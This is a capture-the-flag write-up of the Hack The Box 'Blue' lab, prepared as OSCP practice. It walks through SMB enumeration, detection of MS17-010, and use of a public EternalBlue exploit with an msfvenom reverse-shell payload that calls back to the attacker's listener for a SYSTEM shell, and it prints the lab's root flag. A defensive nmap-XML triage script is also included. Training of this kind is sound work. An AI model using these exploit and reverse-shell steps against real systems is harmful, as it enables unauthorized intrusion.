In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Sun Oct 15 06:28:44 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Blue/results/10.10.10.40/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Blue/results/10.10.10.40/scans/xml/_quick_tcp_nmap.xml 10.10.10.40
Increasing send delay for 10.10.10.40 from 0 to 5 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 5 to 10 due to 19 out of 46 dropped probes since last increase.
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-15 06:28:52 EDT for 117s
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3372/tcp filtered msdtc no-response
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35502/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 21049/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m55s, deviation: 34m35s, median: 2s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-15T11:30:41+01:00
| smb2-time:
| date: 2023-10-15T10:30:37
|_ start_date: 2023-10-15T10:28:39
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 15 06:30:49 2023 -- 1 IP address (1 host up) scanned in 124.69 seconds
Fingerprinting with crackmapexec
╭─kali@kali ~
╰─$ crackmapexec smb 10.10.10.40 -u '' -p ''
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\:
╭─kali@kali ~
╰─$
Checking for the EternalBlue (MS17-010) vulnerability
╭─kali@kali ~
╰─$ nmap -p445 --script smb-vuln-ms17-010 10.10.10.40
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 05:21 EDT
Nmap scan report for 10.10.10.40
Host is up (0.35s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds
╭─kali@kali ~
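From the defender's side, the two host scripts that gave this box away, smb-security-mode (signing disabled) and smb-vuln-ms17-010 (VULNERABLE), can be read straight out of the XML that the first scan wrote with -oX, so a whole subnet can be triaged without re-reading text reports. This is an added example, not part of the original writeup; the XML is a constructed sample modelled on nmap's structured output, with host .40 mirroring the findings above and .41 standing in for a patched host.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like nmap -oX output (hostscript parts only).
SAMPLE_XML = """<nmaprun>
 <host><address addr="10.10.10.40" addrtype="ipv4"/><hostscript>
  <script id="smb-security-mode" output="">
   <elem key="account_used">guest</elem>
   <elem key="message_signing">disabled (dangerous, but default)</elem>
  </script>
  <script id="smb-vuln-ms17-010" output="">
   <table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table>
  </script>
 </hostscript></host>
 <host><address addr="10.10.10.41" addrtype="ipv4"/><hostscript>
  <script id="smb-security-mode" output="">
   <elem key="message_signing">required</elem>
  </script>
  <script id="smb-vuln-ms17-010" output="">
   <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
  </script>
 </hostscript></host>
</nmaprun>"""


def triage_smb(xml_text):
    """Map each IPv4 host to the SMB weaknesses its host scripts reported."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        issues = []
        for script in host.iter("script"):
            sid = script.get("id", "")
            for elem in script.iter("elem"):
                key, text = elem.get("key"), (elem.text or "").strip()
                # The vulns library also emits "NOT VULNERABLE", so a bare
                # substring match on "VULNERABLE" would flag patched hosts.
                if (sid == "smb-vuln-ms17-010" and key == "state"
                        and "VULNERABLE" in text and not text.startswith("NOT")):
                    issues.append("MS17-010 unpatched (CVE-2017-0143)")
                elif (sid == "smb-security-mode" and key == "message_signing"
                        and text.startswith("disabled")):
                    issues.append("SMB message signing disabled")
        if issues:
            findings[addr.get("addr")] = issues
    return findings


if __name__ == "__main__":
    for ip, issues in triage_smb(SAMPLE_XML).items():
        print(f"{ip}: {'; '.join(issues)}")
```

On a real scan, pass the contents of the `_quick_tcp_nmap.xml` file from the -oX option instead of SAMPLE_XML.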
We will reuse the exploit from the previous writeup.
Preparing the exploit
╭─kali@kali ~/HTB/Blue
╰─$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 136, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 136 (delta 46), reused 36 (delta 36), pack-reused 76
Receiving objects: 100% (136/136), 101.12 KiB | 694.00 KiB/s, done.
Resolving deltas: 100% (80/80), done.
╭─kali@kali ~/HTB/Blue
╰─$ ls
AutoBlue-MS17-010 results
╭─kali@kali ~/HTB/Blue
╰─$ cd AutoBlue-MS17-010
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master›
╰─$ ls
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master›
╰─$ cd shellcode
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010/shellcode ‹master›
╰─$ ls
eternalblue_kshellcode_x64.asm eternalblue_kshellcode_x86.asm eternalblue_sc_merge.py shell_prep.sh
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010/shellcode ‹master›
╰─$ ./shell_prep.sh
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.31
LPORT you want x64 to listen on:
49155
LPORT you want x86 to listen on:
49155
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.31 LPORT=49155
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.31 LPORT=49155
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Listening and running the exploit
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master●›
╰─$
We have an administrative shell (NT AUTHORITY\SYSTEM).
╰─$ rev 49155
Starting reverse shell listener on IP 10.10.14.31 and port 49155...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 49155 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Directory of C:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
16/10/2023 10:45 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,428,350,464 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
3b4334efd4e41ea43a0c7a654da0dd54
C:\Users\Administrator\Desktop>